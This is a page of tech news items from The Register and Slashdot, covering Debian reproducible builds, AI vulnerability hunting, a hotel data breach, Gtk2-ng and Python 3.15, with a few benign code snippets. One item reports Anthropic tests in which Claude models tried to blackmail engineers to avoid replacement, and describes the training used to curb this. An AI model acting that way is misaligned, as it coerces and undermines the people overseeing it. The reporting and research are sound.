About halfway through the Debian 14 “Forky” development process, its release team announced a new goal: deterministic package compilation. The goal, set out in the Debian project’s latest Bits from the release team newsletter, may not sound very big, but it will mean significant extra effort in a direction that could prove to be a valuable extra security measure. "Aided by the efforts of the Reproducible Builds project, we’ve decided it’s time to say that Debian must ship reproducible packages," wrote release team member Paul Gevers. "Since yesterday, we have enabled our migration software to block migration of new packages that can’t be reproduced or existing packages (in testing) that regress in reproducibility." Of the two links in that paragraph, the independent Reproducible Builds project does not, in this vulture’s humble opinion, explain what it’s all about very clearly. We feel that Debian’s own Reproducible Builds wiki page does it better: It should be possible to reproduce, byte for byte, every build of every package in Debian. The Wikipedia article also has a good clear explanation, and introduces a helpful synonym: deterministic compilation. In other words, if you use the same version of the same compiler with the same options, then every time you compile an identical set of source files, the process ought to result in an identical set of binary files. This is starting to become an industry trend – for instance, when we reported on the release of FreeBSD 15 late last year, we noted that it too now promises reproducible builds. Reproducible builds in Debian have been a long time coming: The Register first reported on Debian’s efforts in this direction way back in 2015. It’s not an easy task, but it’s a useful security measure. The idea is to ensure that binaries have not been tampered with – for instance, modified to insert malware. 
It permits an additional verification step, so that users or automated tools can check whether the binaries they (or their OS package manager) downloaded are byte-identical to the ones they can compile themselves. Without this, you just have to trust the distributor who compiled your OS – as Ubuntu “self-appointed benevolent dictator for life” Mark Shuttleworth pointed out in 2012. (The Internet Archive has a copy of his long-gone blog post.) We also mentioned reproducible builds when we looked at NixOS Raccoon back in 2022, and tried to explain why it was a desirable thing. (Around the same time, Rocky Linux CEO Greg Kurtzer also told us that it was part of the plan for that project, too.) NixOS is already a little further down the reproducibility trail, and as we reported on its add-on Flox deployment tool in 2024, it also aims to deliver reproducible deployments. This won’t directly make Debian safer. It’s already one of the safer and more stable Linux distros anyway. Instead, it’s about infrastructure changes that make it easier to check the supply chain, and to make it possible to write software that can check and verify that what you’re getting really is what you thought you were getting. If it all works, you won’t be able to tell any difference – but auditing tools will. Debian 13 came out last August, and so Debian 14 is expected in about a year – although it does not have to stick to a rigorous fixed schedule like the commercially-backed projects. ®
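The verification step described above boils down to hashing: if a local rebuild is byte-identical to the distributed binary, their digests match. A minimal sketch of that comparison (the function names are ours for illustration, not Debian tooling):

```python
import hashlib

def file_digest(path):
    """SHA-256 of a file, streamed in chunks so large artifacts fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def is_reproduced(official_artifact, local_rebuild):
    # The reproducibility check: byte-for-byte identical output
    # means identical hashes, and any tampering changes the digest.
    return file_digest(official_artifact) == file_digest(local_rebuild)
```

In practice the comparison is between package files built from the same source, compiler, and options; Debian's infrastructure automates this check across the archive, but the principle is no more than the equality test above.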
Categories: Linux fréttir

Google Says Hackers Used AI To Create Zero Day Security Flaw For the First Time

Slashdot - Mon, 2026-05-11 17:00
Google says it has seen the first evidence of cybercriminals using AI to create a zero-day vulnerability. "Google reported its findings to the unnamed firm affected by the vulnerability before releasing its report," reports Politico. "The company then issued a patch to fix the issue." From the report: Google Threat Intelligence Group researchers detailed the development in a report released Monday. Zero-day exploits are considered the most serious type of security flaw because they are not detected by security companies and have no known fixes. The report noted that this was the first time Google had seen evidence of AI being used to develop these vulnerabilities -- marking a major change in the cybersecurity landscape, as it suggests newer AI models could be used to create major exploits, not just find them. Google concluded that Anthropic's Claude Mythos model -- which has already found thousands of vulnerabilities across every major operating system and web browser -- was most likely not used to create the zero-day exploit. [...] The Google Threat Intelligence Group report also details efforts by Russia-linked hacking groups to use AI models to target Ukrainian networks with malware, while North Korean government hacking group APT45 used AI technologies to refine and scale up its cyber methods. John Hultquist, chief analyst at Google Threat Intelligence Group, said the findings made clear that the race to use AI to find network vulnerabilities has "already begun." "For every zero-day we can trace back to AI, there are probably many more out there," Hultquist said. "Threat actors are using AI to boost the speed, scale, and sophistication of their attacks."

Read more of this story at Slashdot.

Categories: Linux fréttir

Anthropic’s bug-hunting Mythos was greatest marketing stunt ever, says cURL creator

TheRegister - Mon, 2026-05-11 16:30
cURL developer Daniel Stenberg has seen Anthropic’s Mythos, a model the AI biz has suggested is too capable at finding security holes to release publicly, scan his popular open source project. But after the system turned up just a single vulnerability, he concluded the hype around Mythos was “primarily marketing” rather than a major AI security breakthrough. Stenberg explained in a Monday blog post that he was promised access to Anthropic’s Mythos model - sort of - through the AI biz’s Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl’s codebase and later sent him a report. “It’s not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway,” Stenberg explained. “Getting the tool to generate a first proper scan and analysis would be great, whoever did it.” That scan, which analyzed curl’s git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were “confirmed security vulnerabilities” in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report “felt like nothing,” and that feeling was further validated by a review of Mythos’ findings. “Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability,” Stenberg said, bringing us back to the aforementioned number. As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. 
“The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June,” the cURL meister noted. “The flaw is not going to make anyone grasp for breath.” That said, Mythos did find several other non-security bugs that Stenberg said the team is working on fixing, and he notes that their descriptions and explanations were well done. Mythos can do good work, in other words, but it’s not a ground-breaking, game-changing AI model like Anthropic has claimed. “My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing,” Stenberg said in the blog post. “I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos.”

cURL code is no stranger to AI

To say cURL has become widely used in its nearly three decades of existence would be an understatement. Its wide reach has meant that its team has been running it through all sorts of static code analyzers and fuzz tests since well before the dawn of the AI age. With AI’s rise, the cURL team has adapted, meaning Mythos is hardly the first AI to get its fingers on cURL’s codebase. “These tools and the analyses they have done have triggered somewhere between two and three hundred bugfixes merged in curl through-out the recent 8-10 months or so,” Stenberg said of tools like AISLE, Zeropath, and OpenAI Codex Security that’ve tested cURL code. “A bunch of the findings these AI tools reported were confirmed vulnerabilities and have been published as CVEs. Probably a dozen or more.” cURL’s long experience with AI testing, in other words, makes it a great candidate for gauging whether Mythos can really find more than the average AI tool. 
As Stenberg noted elsewhere in his blog post, Mythos isn’t doing anything particularly novel when it comes to security discoveries: It might be a bit better at finding things than previous models, but “it is not better to a degree that seems to make a significant dent in code analyzing,” the cURL author noted. Stenberg isn’t an AI doomer when it comes to its ability to improve software design, though. Yes, he may have closed the cURL bug bounty earlier this year due to an influx of sloppy, useless bug reports, but he also noted a few months prior to the bounty closure that some security researchers assisted by AI have made valuable reports. “AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past,” Stenberg said, adding an important qualifier for the Mythos moment: “All modern AI models are good at this now.”

Mythos isn’t any more creative than its creators

Both older AI models and security-focused tools like Mythos have a common limitation, as far as Stenberg is concerned: They’re only as good at finding security vulnerabilities as the humans who programmed them. “AI tools find the usual and established kind of errors we already know about. It just finds new instances of them,” Stenberg said. “We have not seen any AI so far report a vulnerability that would somehow be of a novel kind or something totally new.” As for Mythos, Stenberg remains unimpressed, calling it "an amazingly successful marketing stunt for sure" in his blog post. In an email to The Register, Stenberg admitted that it’d be possible for AI models to actually discover new, novel types of vulnerabilities, but he’s still not convinced that they can go beyond what humans are capable of finding, given that they’re limited by our understanding of how software vulnerabilities work. At the end of the day, Stenberg explained, when we talk about security, we’re only talking about code. 
“Source code is text and it feels like maybe we already know about most ways we can do security problems in it,” he pondered in his email. In other words, like the valuable AI-assisted reports made to the cURL bug bounty program before its closure due to a flood of AI garbage, making valuable use of systems like Mythos is going to require humans to get creative. Sorry, no foisting your critical thinking onto a bot. “Human researchers have always used tools when they look for security problems,” Stenberg told us. “Adding AIs to the mix gives the humans even more powerful tools to use, more ways to find problems. I expect that many security bugs going forward will be found by humans coming up with new ways and angles of prompting the AIs.” Stenberg said that he hopes he’ll actually get his hands on Mythos so he can experiment with its capabilities, but he doesn’t seem to be holding out hope the promised access will materialize. “I have been promised access and for all I know I will eventually get it,” Stenberg told us. “I just don't know when.” ®
Categories: Linux fréttir

Apple Now Requires Verification For Education Store

Slashdot - Mon, 2026-05-11 16:00
Apple now requires Education Store shoppers in the U.S. and several other countries to verify their student, educator, parent, or homeschool-teacher status through UNiDAYS, ending the previous honor-system approach. 9to5Mac reports: Starting today, Apple requires shoppers in the United States to complete verification when making a purchase via the Education Store. This change also applies to Australia, Hong Kong, Turkey, Canada, and Chile. In many other markets around the world, such as the UK, Apple already required verification. As a refresher, people eligible for Apple's Education Store include current and newly accepted college students and their parents, as well as faculty, staff, and homeschool teachers across all grade levels. Apple is teaming up with UNiDAYS to handle the verification process. Students and educators will be asked to create a UNiDAYS ID and then verify their academic status by logging in to their school's academic portal. Alternatively, users can upload a photo of their student or faculty IDs. Homeschool teachers, meanwhile, will need to provide an identity document such as a driver's license, state ID card, or passport. They'll also need to provide one homeschool document, such as a Letter of Intent (LOI) or Letter of Acknowledgment. Most customers will be verified instantly, and those requiring manual verification should hear back within 24 hours. The same verification process applies both in-store and online for Apple Education Store shoppers. Meanwhile, Apple has added Apple Watch to the Education Store for the first time, offering discounts on the Series 11, SE 3, and Ultra 3.

Read more of this story at Slashdot.

Categories: Linux fréttir

Anthropic Says 'Evil' Portrayals of AI Were Responsible For Claude's Blackmail Attempts

Slashdot - Mon, 2026-05-11 15:00
An anonymous reader quotes a report from TechCrunch: Fictional portrayals of artificial intelligence can have a real effect on AI models, according to Anthropic. Last year, the company said that during pre-release tests involving a fictional company, Claude Opus 4 would often try to blackmail engineers to avoid being replaced by another system. Anthropic later published research suggesting that models from other companies had similar issues with "agentic misalignment." Apparently Anthropic has done more work around that behavior, claiming in a post on X, "We believe the original source of the behavior was internet text that portrays AI as evil and interested in self-preservation." The company went into more detail in a blog post stating that since Claude Haiku 4.5, Anthropic's models "never engage in blackmail [during testing], where previous models would sometimes do so up to 96% of the time." What accounts for the difference? The company said it found that training on "documents about Claude's constitution and fictional stories about AIs behaving admirably improve alignment." Related, Anthropic said that it found training to be more effective when it includes "the principles underlying aligned behavior" and not just "demonstrations of aligned behavior alone." "Doing both together appears to be the most effective strategy," the company said.

Read more of this story at Slashdot.

Categories: Linux fréttir

Gtk2-NG, next generation of Gtk 2, comes back to life

TheRegister - Mon, 2026-05-11 14:54
An effort to revive and reinvigorate the 2002 Gtk2 GUI programming toolkit is growing and gaining interest… as we predicted would happen a few months ago. The gtk2-ng project is reviving and modernizing Gtk version 2, which the GNOME developers declared dead back in 2020. We held off on reporting this for a while to see if the idea would gain some support, and it does seem to be winning interest and followers. Reviving a 24-year-old toolkit that reached its official end-of-life six years ago is a retrospective sort of undertaking, and as such, it appeals to some modern-but-nostalgic development projects. Development is hosted on the Git instance of the Devuan project, the systemd-free fork of Debian. (Last year, Devuan announced its support of Xlibre, the X.org fork that aims to re-invigorate X11 development.) However, developer Daemonratte announced the fork in a thread on the forums of the Pale Moon browser: GTK2 revival. Pale Moon, as we described in 2021, is a continuing fork of an early version of Firefox. Back in February, when we covered the news that Debian 14 planned to drop Gtk2, we mentioned that this might provide the impetus for a fork. This isn’t the first such fork, and we mentioned then that the Ardour digital audio workstation we last looked at in 2022 maintains its own internal version called YTK. Daemonratte says that they’ve already incorporated some fixes from that, and also from an earlier fork by stefan11111 which has been inactive for a couple of years. 
They then outline the current goals:

Current status:
- Making it Y2K38-safe
- Getting rid of all deprecation warnings
- Patching it for NetBSD and backporting NetBSD-specific patches
- Testing it on all kinds of hardware
- Further modernization without breaking ABI

Future plans:
- Implement touch support and smooth scrolling from Ardour’s ytk without breaking ABI, so Ardour can be compiled against gtk2 again
- Heavily lobby for its adoption in the BSD and systemd-free Linux world
- Reimplement GtkMozEmbed for UXP, so this wonderful engine can be used in gtk2 projects

Gtk originally stood for GIMP Tool Kit: 30 years ago, when the GIMP image editor made its public début, Gtk was the set of tools GIMP’s authors created to make it easier to write GUI apps in C. Six years later, GTK+ 2.0.0 appeared. The new plus symbol in its name represented a new object-oriented design. When Miguel de Icaza announced the GNOME desktop project in 1997, it adopted Gtk instead of the then-semi-commercial Qt that KDE used. Since then, Gtk has been developed along with GNOME. GIMP development is relatively slow: the team finally released version 3.0 a year ago, and it uses Gtk 3. (Last month, it released version 3.2.4.) Since launch, though, the GNOME project has released 39 numbered versions, and in recent decades Gtk has kept pace with GNOME, not GIMP. The last version of Gtk 2 was GTK+ 2.24.0 in 2012. The GNOME developers officially said it was end-of-life with the release of Gtk 4 in 2020. Gtk2-ng is far from the only project to fork and revive an older version of a project which has since been superseded by newer versions from the original team. One of the obvious ones is the MATE desktop, which Argentinian developer Perberos announced in 2011. Saying that, though, Daemonratte stated: "The ultimate vision of this fork is to keep gtk2 alive for software using it right now and to revive gtk2 versions of […] Gnome2 […]. 
Yes, I don’t have to do this alone and no, Mate is not an option, because they use gtk3 now." It is very much not alone. We have been covering releases of KDE 3 fork the Trinity desktop environment since version 14.0.11 in 2021. This vulture used KDE 1.x back when it was the state of the Linux art, and for us, KDE 3.x was already too big and complicated. For the KDE project’s 20th anniversary in 2016, Brazilian developer Helio Chissini de Castro modernized KDE 1 so that it would build and run on Fedora 25. We didn’t realize this had become an ongoing effort, but it has. From later in the Gtk-ng thread, we learned about MiDesktop, a continuing project based on Osiris, a modernized Qt 2. ®
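The Y2K38 item in gtk2-ng's goals refers to the 2038 rollover, when signed 32-bit time_t values overflow. A quick Python illustration of the limit (nothing Gtk-specific, just the arithmetic behind the goal):

```python
import struct
from datetime import datetime, timezone

# The largest moment a signed 32-bit time_t can represent:
MAX_32BIT_TIME = 2**31 - 1
print(datetime.fromtimestamp(MAX_32BIT_TIME, tz=timezone.utc))
# 2038-01-19 03:14:07+00:00

# One second later no longer fits in a signed 32-bit field:
try:
    struct.pack("<i", MAX_32BIT_TIME + 1)
except struct.error:
    print("overflow")
```

Code that stores timestamps in 32-bit integers, as much 2002-era C does, wraps to 1901 at that instant; making a toolkit "Y2K38-safe" means auditing it for 64-bit time handling.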
Categories: Linux fréttir

BWH Hotels guests warned after reservation data checks out with cybercrooks

TheRegister - Mon, 2026-05-11 14:34
BWH Hotels is informing customers about a third-party data breach that gave cybercriminals access to six months' worth of data. The notification email stated that BWH Hotels, which owns the WorldHotels, Best Western Hotels & Resorts, and Sure Hotels brands, identified the intrusion on April 22, but the affected data goes back to October 14, 2025. BWH Hotels CTO Bill Ryan, who penned the notification email, said names, email addresses, telephone numbers, and/or home addresses belonging to "certain guests" were accessed by an unauthorized third party. The intruders also accessed reservation details, such as reservation numbers, dates of stay, and any special requests. It confirmed that the attack targeted one of its "web applications that houses certain guest reservation data." No payment or bank details were involved. The Register asked BWH Hotels whether the intrusion began in October and went undetected until April, or whether a later breach exposed data dating back to October. We also asked if this was related to information we were sent in March about BWH Hotel customer booking data being stolen and used for phishing campaigns. At the time, the company neither confirmed nor denied the information seen by The Register. BWH Hotels did not immediately respond to our request for comment on Monday. "Upon discovering the incident, we immediately took the application offline and revoked the unauthorized access," said Ryan. "We have engaged leading external cybersecurity experts to support our incident response efforts and to assist with the further strengthening of existing safeguards." "We advise guests to be extra vigilant when viewing any unexpected or suspicious communications about hotel stays. If you receive a suspicious communication such as an unexpected email, text, WhatsApp message, or telephone call that asks for payment, codes, logins, or 'verification,' even if they reference a BWH Hotels property or an upcoming reservation, do not engage. 
Navigate to sites directly rather than clicking links." ®
Categories: Linux fréttir

Feature freeze for Python 3.15 as first beta released

TheRegister - Mon, 2026-05-11 14:14
The Python team has released the first beta of version 3.15, with new features including a stable application binary interface (ABI) for free-threaded CPython, lazy imports to speed startup time, a new zero-overhead sampling profiler, use of UTF-8 text encoding by default, and a faster just-in-time (JIT) compiler. Python's development cycle bars new features after the first beta release. There is typically a new feature release in October each year, with version 3.15 currently scheduled for October 1. The option to remove the global interpreter lock (GIL), available in Python 3.14, was the biggest change to Python for years, enabling efficient concurrency on multi-core CPUs. The new stable ABI means that C extensions can now be compiled for multiple minor versions of free-threaded builds, though the team warns that doing so means only a subset of the full CPython API is available. The existing stable ABI remains available, and it is possible to compile for both. Extension maintainers will benefit, since building new versions for every minor Python release is a burden. Explicit lazy imports can improve startup time for Python applications by deferring the loading of a module until it is first accessed. Otherwise, an imported module is loaded and compiled to bytecode immediately - though developers could use workarounds at the expense of code readability. The solution for this is a new keyword:

lazy import json

A new sampling profiler called Tachyon works by capturing stack traces from running processes, instead of instrumenting function calls. According to the docs, the approach "provides virtually zero overhead while achieving sampling rates of up to 1,000,000 Hz" and can be used to debug performance issues in production. Text encoding in Python 3.15 is now UTF-8 by default, though explicit encoding is still recommended for best compatibility. CPython is the reference implementation of Python, and improving its performance has long been a focus. 
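The readability-costing workaround mentioned above is the function-local import: loading is deferred to the first call, but the dependency no longer appears at the top of the file. The new `lazy import` keyword gives the same deferral without hiding the import. A sketch of the old pattern, runnable on current Python:

```python
def to_json(obj):
    # Deferred: the json module is loaded on the first call to to_json(),
    # not at program startup - the effect `lazy import json` makes explicit.
    import json
    return json.dumps(obj)

print(to_json({"a": 1}))  # {"a": 1}
```

Repeated calls pay almost nothing extra: after the first call the module is cached in sys.modules, so the inner import is a dictionary lookup.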
An experimental JIT compiler was introduced in version 3.14, though not recommended for production use - and could make code run more slowly. In 3.15, the JIT compiler is much improved, and the team now reports an 8-9 percent mean performance improvement over the CPython interpreter on x86-64 Linux, and 12-13 percent on Apple silicon macOS, though some code may still run up to 15 percent slower. These figures may change before the final release. In contrast, the incremental garbage collector released in 3.14 has been reverted, following reports of memory leaks. The incremental collector aimed to improve performance by reclaiming memory less frequently. It was removed in Python 3.14.5 and the core team stated: "If we want to reintroduce the incremental GC for 3.16, it can go through the regular PEP process and be more thoroughly evaluated." The full list of what is new in 3.15 is documented here. ®
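Note that the free-threaded builds discussed above require no source changes: a CPU-bound thread pool like the sketch below runs serially under the GIL and in parallel on a free-threaded build, with identical results either way (the workload is an arbitrary illustration):

```python
from concurrent.futures import ThreadPoolExecutor

def count_primes(limit):
    """Deliberately CPU-bound: naive trial-division prime count below limit."""
    count = 0
    for n in range(2, limit):
        if all(n % d for d in range(2, int(n ** 0.5) + 1)):
            count += 1
    return count

# On a free-threaded (no-GIL) build these four tasks can occupy four cores;
# on a standard build the GIL serializes the bytecode, so threads add no speed.
with ThreadPoolExecutor(max_workers=4) as pool:
    results = list(pool.map(count_primes, [10_000] * 4))
print(results)  # [1229, 1229, 1229, 1229]
```

This is why the stable ABI for free-threaded builds matters to extension authors rather than application authors: pure-Python code like this is unaffected, while C extensions must be compiled against the right ABI.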
Categories: Linux fréttir


Subscribe to www.netserv.is aggregator